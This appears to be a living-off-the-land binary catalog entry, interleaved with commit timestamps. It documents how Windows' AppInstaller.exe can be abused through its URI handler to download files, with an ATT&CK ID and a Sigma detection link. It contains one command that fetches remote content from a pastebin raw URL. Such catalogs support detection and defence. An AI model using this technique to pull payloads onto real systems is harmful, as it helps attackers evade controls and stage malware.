2020-12-02 17:35:49 +01:00
---
Name : AppInstaller.exe
Description : Tool used for installation of AppX/MSIX applications on Windows 10
Author : 'Wade Hickey'
Created : '2020-12-02'
Commands :
- Command : start ms-appinstaller://?source=https://pastebin.com/raw/tdyShwLw
2021-11-05 19:58:26 +01:00
Description : AppInstaller.exe is spawned by the default handler for the URI, it attempts to load/install a package from the URL and is saved in C:\Users\%username%\AppData\Local\Packages\Microsoft.DesktopAppInstaller_8wekyb3d8bbwe\AC\INetCache\<RANDOM-8-CHAR-DIRECTORY>
2020-12-02 17:35:49 +01:00
Usecase : Download file from Internet
Category : Download
Privileges : User
MitreID : T1105
OperatingSystem : Windows 10
Full_Path :
- Path : C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.11.2521.0_x64__8wekyb3d8bbwe\AppInstaller.exe
2021-11-15 14:19:03 +01:00
Detection :
2021-11-25 10:42:26 +01:00
- Sigma : https://github.com/SigmaHQ/sigma/blob/bdb00f403fd8ede0daa04449ad913200af9466ff/rules/windows/dns_query/win_dq_lobas_appinstaller.yml
2020-12-02 17:35:49 +01:00
Resources :
- Link : https://twitter.com/notwhickey/status/1333900137232523264
Acknowledgement :
- Person : Wade Hickey
Handle : '@notwhickey'